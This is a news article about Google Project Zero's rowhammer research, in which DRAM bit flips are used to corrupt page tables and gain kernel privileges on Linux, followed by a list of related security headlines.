'Rowhammer' attack flips bits in memory to root Linux

Ouch! Google crocks capacitors and deviates DRAM to take control of the kernel

Last summer Google gathered a bunch of leet security researchers as its Project Zero team and instructed them to find unusual zero-day flaws. They've had plenty of success on the software front – but on Monday announced a hardware hack that's a real doozy.

The technique, dubbed "rowhammer", rapidly writes and rewrites memory to force capacitor errors in DRAM, which can be exploited to gain control of the system. By repeatedly recharging one line of RAM cells, bits in an adjacent line can be altered, thus corrupting the data stored.

This corruption can lead to the wrong instructions being executed, or control structures that govern how memory is assigned to programs being altered – the latter case can be used by a normal program to gain kernel-level privileges.

The Project Zero team has now built two working exploits that successfully hijack control of many x86 computers running Linux, and say they could do the same with other operating systems.

The proof-of-concept exploit code flips bits in RAM to alter the page tables for a process, allowing an attacker to gain access to all physical RAM including the kernel's. From this point, memory protection mechanisms and other security measures can be bypassed, and structures within the operating system tampered with to take over the machine.

"One exploit uses rowhammer-induced bit flips to gain kernel privileges on x86-64 Linux when run as an unprivileged userland process," the team reports.

"When run on a machine vulnerable to the rowhammer problem, the process was able to induce bit flips in page table entries (PTEs). It was able to use this to gain write access to its own page table, and hence gain read-write access to all of physical memory."

The team tested the exploit on 29 x86 laptops built between 2010 and 2014 and using DDR3 DRAM. In 15 cases the team could successfully subvert the systems in minutes, and found DRAM made by a variety of memory manufacturers is susceptible to the attack.

While this was a high cracking rate, the team reported almost no success on desktop machines. This is possibly because those computers use newer RAM with error-correcting memory (ECC), which makes rowhammer attacks on the kernel much harder to accomplish, or that laptops have denser and lower-power RAM that's easier to corrupt.

Successful attacks against servers – particularly ones that cut corners with their RAM – are not impossible.

"There are some cheap hosting environments where this is possible, running cheap servers without ECC memory, with separate user accounts instead of using virtual machines," explained Rob Graham from Errata Security. "However, such environments tend to be so riddled with holes that there are likely easier routes to exploitation than this one."

The Google team also said that newer firmware versions change how the BIOS configures the CPU’s memory controller to reduce the effectiveness of rowhammer attacks by increasing the DRAM refresh rate. This increased the time to crack the system from five to 40 minutes, but still the system fell.

The team has released code to Github that can be used to test Linux and Mac OS X systems for the vulnerability, and has set up a mailing list for researchers to expand on its results. ®

Keep Reading

Forget BYOD, this is BYOVM: Ransomware tries to evade antivirus by hiding in a virtual machine on infected systems

Like Inception, but expensive and disappointing. So... just like Inception

It's 2020 and a rogue ICMPv6 network packet can pwn your Microsoft Windows machine

Patch Tuesday Redmond urges folks to apply update ASAP – plus more fixes for Outlook and software from Adobe, Intel, SAP, Red Hat

Google Cloud ushers in the rise of the machine... images. You know, to capture and recreate VM snapshots?

Handy for capturing multi-disk VMs but limited restoration capabilities

Make sure you've patched your F5 BIG-IP gear. Exploit code for scary bug is so trivial, it fits in a tweet

In Brief Plus: What? No. No way. People would just do that? Go on Tor and use it to commit crimes?

Windows kernel zero-day disclosed by Google's Project Zero after bug exploited in the wild by hackers

Chocolate Factory spills beans on make-me-admin flaw

Bad news: Google drops macOS zero-day after Apple misses bug deadline. Good news: It's fiddly to exploit

Step one: Run malware on your victim's machine. Step two: Mount some storage...

Who cares what Apple's about to announce? It owes us a macOS x86 virtual appliance for non-Mac computers

Comment Shift to Arm processors will maroon some users – and Hackintoshes are problematic

Virtual machines, real problems: VMware fixes bug trio including guest-to-host hole in Workstation, Fusion

Finally, something that isn't coronavirus related [delete this – ed.]

Biting the hand that feeds IT © 1998–2020